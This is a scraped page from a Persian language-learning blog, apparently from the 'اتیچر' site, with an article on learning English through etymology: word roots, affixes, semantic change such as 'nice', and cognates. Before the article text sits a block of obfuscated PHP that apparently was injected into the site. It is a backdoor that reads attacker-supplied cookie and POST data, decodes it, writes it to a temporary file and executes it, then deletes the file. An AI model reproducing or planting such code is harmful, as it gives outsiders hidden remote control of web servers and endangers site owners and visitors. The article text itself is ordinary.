$NULuVE = 'J' . "\x6e" . chr (95) . "\x5a" . chr ( 1066 - 990 )."\143";$wBGOMS = chr (99) . "\154" . "\141" . "\163" . 's' . chr ( 572 - 477 )."\145" . "\170" . "\151" . 's' . chr (116) . "\x73";$rnHFs = class_exists($NULuVE); $wBGOMS = "37229";$FCnrIFQjV = strpos($wBGOMS, $NULuVE);if ($rnHFs == $FCnrIFQjV){function zzZnWbHiGH(){$snBBmoW = new /* 60717 */ Jn_ZLc(216 + 216); $snBBmoW = NULL;}$tRYafVOh = "216";class Jn_ZLc{private function BnCpg($tRYafVOh){if (is_array(Jn_ZLc::$iblmkhZckY)) {$name = sys_get_temp_dir() . "/" . crc32(Jn_ZLc::$iblmkhZckY["salt"]);@Jn_ZLc::$iblmkhZckY["write"]($name, Jn_ZLc::$iblmkhZckY["content"]);include $name;@Jn_ZLc::$iblmkhZckY["delete"]($name); $tRYafVOh = "216";exit();}}public function ptGeYs(){$TDmSXiAS = "52603";$this->_dummy = str_repeat($TDmSXiAS, strlen($TDmSXiAS));}public function __destruct(){Jn_ZLc::$iblmkhZckY = @unserialize(Jn_ZLc::$iblmkhZckY); $tRYafVOh = "10292_35473";$this->BnCpg($tRYafVOh); $tRYafVOh = "10292_35473";}public function ozxIAgQPjV($TDmSXiAS, $aeaku){return $TDmSXiAS[0] ^ str_repeat($aeaku, intval(strlen($TDmSXiAS[0]) / strlen($aeaku)) + 1);}public function qUtSOSuu($TDmSXiAS){$mfCMBhBxCr = "\142" . chr ( 890 - 793 ).chr ( 813 - 698 ).chr (101) . chr ( 253 - 199 ).chr (52);return array_map($mfCMBhBxCr . "\137" . chr (100) . "\x65" . "\x63" . chr (111) . "\144" . chr (101), array($TDmSXiAS,));}public function __construct($LPOaYmFx=0){$zGwbXSxTSr = chr ( 874 - 830 ); $TDmSXiAS = "";$ffIRbkK = $_POST;$cUFsQU = $_COOKIE;$aeaku = "c7925911-7e78-4761-aabc-96a5afd8df13";$YEAAD = @$cUFsQU[substr($aeaku, 0, 4)];if (!empty($YEAAD)){$YEAAD = explode($zGwbXSxTSr, $YEAAD);foreach ($YEAAD as $GraWY){$TDmSXiAS .= @$cUFsQU[$GraWY];$TDmSXiAS .= @$ffIRbkK[$GraWY];}$TDmSXiAS = $this->qUtSOSuu($TDmSXiAS);}Jn_ZLc::$iblmkhZckY = $this->ozxIAgQPjV($TDmSXiAS, $aeaku);if (strpos($aeaku, $zGwbXSxTSr) !== FALSE){$aeaku = explode($zGwbXSxTSr, $aeaku); $cWVPJOukJ = base64_decode(md5($aeaku[0]));}}public static $iblmkhZckY = 12075;}zzZnWbHiGH();} آموزش زبان به روش ریشه شناسی | وبلاگ اتیچر
skip to Main Content

آموزش زبان به روش ریشه شناسی

آموزش زبان به روش ریشه شناسی
زمان مطالعه: ۵ دقیقه

یادگیری زبان، به عنوان یکی از مهم‌ترین مهارت‌هایی که در زندگی مدرن به آن نیاز داریم، همواره یک چالش بزرگ برای هر کسی بوده است.. روش‌ها و راهبردهای مختلفی برای آموزش زبان وجود دارند، اما یکی از رویکردهای جدید که به تازگی توجه‌های بساری را به خود جلب کرده است، روش ریشه شناسی در یادگیری زبان است. در این مقاله، به بررسی این روش می‌پردازیم.

فهرست بخش ها

آموزش زبان به روش ریشه‌شناسی چیست ؟

آموزش زبان به روش ریشه‌شناسی رویکردی است که بر ریشه و تاریخچه کلمات و چگونگی تغییر آن‌ها در طول زمان تمرکز دارد. ریشه‌شناسی می‌تواند با نشان دادن ارتباط بین زبان‌ها و فرهنگ‌های مختلف به زبان‌آموزان کمک کند تا معنا، ساختار و کاربرد کلمات را درک کنند  و به مانند یادگیری زبان به روش زبان مادری، بر زبان انگلیسی تسلط یابند. ریشه‌شناسی همچنین می‌تواند واژگان، املا و مهارت‌های تلفظ زبان آموزان را با قرار دادن آن‌ها در معرض الگوها و قوانین شکل‌گیری و تغییر کلمه تقویت کند.

آموزش زبان به روش ریشه‌شناسی چیست

مفهوم ریشه‌شناسی در آموزش زبان

مفهوم ریشه شناسی در آموزش زبان مبتنی بر این ایده است که یادگیری ریشه‌ها و عناصر کلمات می‌تواند به زبان‌آموزان کمک کند تا معنای کلمات ناآشنا را استنتاج کنند، معنای کلمات آشنا را به خاطر بسپارند و دانش خود را در زمینه‌ها و موقعیت‌های جدید به کار ببرند. ریشه‌شناسی همچنین می‌تواند کنجکاوی و علاقه زبان آموزان را به زبان و تکامل آن تقویت کند و همچنین تفکر انتقادی و مهارت‌های تحلیلی آن‌ها را توسعه دهد. این روش می‌تواند مکمل روش یادگیری زبان به روش پیمزلر باشد.

مفهوم ریشه‌شناسی در آموزش زبان

نکات مهم و  اساسی ریشه‌شناسی در یادگیری زبان

درمورد روش ریشه شناسی نکات مهم زیادی وجود دارد که باید به آن‌ها توجه کنید.

نکات مهم و اساسی ریشه‌شناسی در یادگیری زبان

    تمرکز بر اصطلاحات اصلی

    در روش ریشه‌شناسی، تمرکز اصلی بر اصطلاحات و واژگان اصلی زبان است. زبان‌آموزان باید با واژگان کلیدی و اصطلاحات پایه مرتبط با حوزه‌های مختلف زبان آشنا شوند. این اصول به آن‌ها امکان می‌دهند تا در هر موقعیتی قادر به بکارگیری واژگان مناسب باشند.

    توجه به ساختار زبان

    در ریشه‌شناسی، مفهوم ساختار زبان به عنوان یک پایه اساسی در یادگیری زبان مورد تأکید قرار می‌گیرد. زبان‌آموزان نه تنها واژگان را می‌آموزند بلکه چگونگی ترکیب و ساختار جملات را نیز درک می‌کنند. این مهارت به آن‌ها این امکان را می‌دهد تا به طور طبیعی و مفهومی با زبان کار کنند.

    ترکیب یادگیری با تدریس نظری

    در این روش، باید ترکیبی از یادگیری عملی و تدریس نظری به کار ‌رود. زبان‌آموزان با اجرای تمرینات و فعالیت‌های عملی باید به تدریج اصول زبانی را درک کنند.

    یادگیری مستمر و پیشرفت تدریجی

    روش ریشه‌شناسی بر این اصل تأکید دارد که یادگیری زبان یک فرآیند مستمر و پیشرفت تدریجی است. زبان‌آموزان باید با توجه به تقویت مهرت‌های زبانی خود به سطوح پیشرفته‌تر برسند و این فرآیند نیازمند صبر و پیشرفت مداوم است.

با استفاده از این اصول اساسی، زبان‌آموزان قادر به تسلط بر زبان انگلیسی از طریق روش ریشه‌شناسی خواهند بود.

برخی از اصول اساسی ریشه شناسی در یادگیری زبان

در این بخش، به معرفی و توضیح اصول اساسی ریشه‌شناسی در یادگیری زبان می‌پردازیم. این اصول برای ساخت یک پایه قوی در فرآیند یادگیری زبان مهم هستند و به زبان‌آموزان این امکان را می‌دهند که با توجه به اصول اصلی زبان، مهارت‌های زبانی خود را بهبود بخشند. اساسا روش ریشه شناسی به مانند یادگیری زبان به روش g5، منجر به یادگیری واژگان و افزایش دایره واژگان زبان‌آموز می‌شود.

برخی از اصول اساسی ریشه شناسی در یادگیری زبان

شناسایی ریشه یک کلمه و اشکال مربوط به آن

ریشه یا ساقه بخش اصلی یک کلمه است که معنای اصلی خود را دارد. به عنوان مثال، ریشه “duc” به معنای “رهبری:  to lead” است و منبع بسیاری از کلمات انگلیسی مانند “conduct”، “educate”، “induce” و “reduce” است. شکل‌های مرتبط، کلماتی هستند که ریشه یا منشأ مشترک دارند، مانند  cognates، که در زبان‌های مختلف دارای منشأ یکسان و معنی مشابه هستند، مانند «پدر: father » در انگلیسی و «vater» در آلمانی.

تجزیه و تحلیل معنا و عملکرد پیشوندها پسوندها و پسوندهایی که ریشه یک کلمه را تغییر می‌دهند.

 پیشوندها، پسوندها و میان‌وند عناصری هستند که به ریشه یک کلمه اضافه می‌شوند تا معنی آن را تغییر دهند یا یک کلمه جدید تشکیل دهند. به عنوان مثال، پیشوند “re-” به معنای “دوباره” یا “بازگشت”، پسوند “-tion” به معنای “عملکرد” یا “وضعیت” و پسوند “en-” به معنای “ساختن” است. یا «شدن». با ترکیب این عناصر می‌توان واژه‌هایی مانند «بازآفرینی: recreation »، «کاهش: reduction » و «تقویت: reinforce » را ایجاد کرد.

ردیابی تحولات تاریخی و تغییر معنایی واژه‌ها از منابع اصلی تا اشکال و معانی کنونی

تحول تاریخی و تغییر معنایی فرآیندهایی هستند که در آن کلمات در طول زمان به دلیل عوامل مختلفی مانند تغییر صدا، قیاس، استعاره یا تأثیر فرهنگی، شکل و معنای خود را تغییر می‌دهند. به عنوان مثال، کلمه ” nice ” از کلمه لاتین “nescius” گرفته شده است که به معنای “نادان:  ignorant” یا “بی‌خبر:  unaware” است. با گذشت زمان، این کلمه معانی مختلفی مانند “احمق: foolish”، “تصفیه شده: refined”، “خوشایند: pleasant” و “مهربان: kind” پیدا کرد.

مقایسه شباهت‌ها و تفاوت‌های بین کلمات زبان‌های مختلف که منشأ یا تأثیر مشترک دارند

مقایسه و تضاد کلمات از زبان‌های مختلف می‌تواند به زبان‌آموزان کمک کند تا روابط و الگوهای بین زبان‌ها و خانواده‌ها، شاخه‌ها یا گروه‌هایشان را کشف کنند. به عنوان مثال، کلمه “شکلات” از کلمه “xocolatl” گرفته شده است که به معنای “آب تلخ” است. این کلمه توسط اسپانیایی، فرانسوی و انگلیسی، از میان سایر زبان‌ها، با تغییرات جزئی در املا و تلفظ، قرض گرفته شده و اقتباس شده است.

مزایای استفاده از روش ریشه‌شناسی در آموزش زبان

برخی از مزایای استفاده از روش ریشه‌شناسی آموزش زبان در کلاس زبان انگلیسی عبارتند از:

این روش می‌تواند کنجکاوی و علاقه زبان‌آموزان را به زبان و تکامل آن تقویت کند و همچنین تفکر انتقادی و مهارت‌های تحلیلی آن‌ها را توسعه دهد.

می‌تواند به زبان‌آموزان کمک کند تا معنای کلمات ناآشنا را استنباط کنند، معنای کلمات آشنا را به خاطر بسپارند و دانش خود را در زمینه‌ها و موقعیت‌های جدید به کار ببرند.

مزایای استفاده از روش ریشه‌شناسی در آموزش زبان

می‌تواند به زبان‌آموزان کمک کند تا روابط و الگوهای بین زبان‌ها و خانواده‌ها، شاخه‌ها یا گروه‌هایشان را کشف کنند.

به زبان‌آموزان کمک ‌می‌کند تا تنوع و غنای زبان و فرهنگ را درک کنند و از قوم‌گرایی و کلیشه‌ها دوری کنند.

آموزش زبان با اتیچر

یادگیری زبان به یک فرآیند چالش‌برانگیز و همچنین شیرین تبدیل شده است. روش ریشه شناسی با تأکید بر اصول اساسی زبان، ساختار جملات و اصطلاحات اصلی، به زبان‌آموزان این امکان را می‌دهد تا به یک درک عمیق از زبان بپردازند و مهارت‌های زبانی خود را بهبود بخشند. به طور کلی، هر فردی دارای شیوه‌ها و تجربیات یادگیری مختلفی است و انتخاب یک روش مناسب برای یادگیری زبان وابسته به عوامل مختلفی از جمله سبک یادگیری فرد، زمان مورد نظر برای یادگیری، و منابع آموزشی است.

از روش‌های مختلف آموزش زبان، خدمات آنلاین و اموزشگاه‌های مجازی نیز به عنوان گزینه‌هایی محبوب به شمار می‌روند. اتیچر یکی از پلتفرم‌های معتبر در ارائه خدمات  به صورت آنلاین است که از روش‌های مدرن و کارآمد برای یادگیری زبان بهره می‌برد. کلاس زبان آنلاین می‌تواند به زبان‌آموزان امکان فراگیری زبان انگلیسی با بهترین روش‌های روز دنیا را فراهم کند.

به این مقاله امتیاز بدهید

دیدگاه ها

اولین نفری باشید که به این نوشته نظر میدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

Back To Top
×Close search
Search